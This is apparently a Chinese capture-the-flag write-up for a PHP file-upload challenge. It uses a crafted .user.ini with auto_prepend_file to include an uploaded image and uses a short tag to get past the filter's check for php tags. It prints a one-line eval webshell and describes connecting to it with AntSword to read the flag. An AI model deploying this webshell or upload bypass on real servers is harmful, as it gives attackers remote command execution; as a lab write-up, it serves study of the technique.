知识点讲解

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行
关于.user.ini文件是怎么利用的，可以点此查看非常详细，我这里截取一段

.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。
而且，和php.ini不同的是，.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载
使用方法：
指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中：
auto_prepend_file=01.gif
01.gif是要包含的文件。
所以，我们可以借助.user.ini轻松让所有php文件都自动包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。

上传的时候会检测文件内有没有php标签，导致上传不了，我们可以使用短标签进行绕过，以下是介绍

从PHP5.4.0开始，无论php.ini中如何设置，都可以使用短标签。
以下为例子：
一句话木马：<?= eval($_POST[cmd]);?>

了解了以上的知识之后，我们就可以开始做题了

开始做题

创建环境后打开页面，是一个上传界面

正常上传php文件，是不可行的

我们尝试上传一个.user.ini上去，让他使所有php文件都自动包含我们的一句话木马

记得要把文件类型改成图片格式的

文件上传成功，我们再上传一个a.gif，里面用短标签写上一句话木马

上传成功，我们使用蚁剑连接一下，这里注意，连接的时候是index.php

连接上去之后，我们查看/flag文件就可以得到flag了

此题结束

结尾

学到了新的知识，比如php短标签绕过，比如专用于fastcgi的.user.ini文件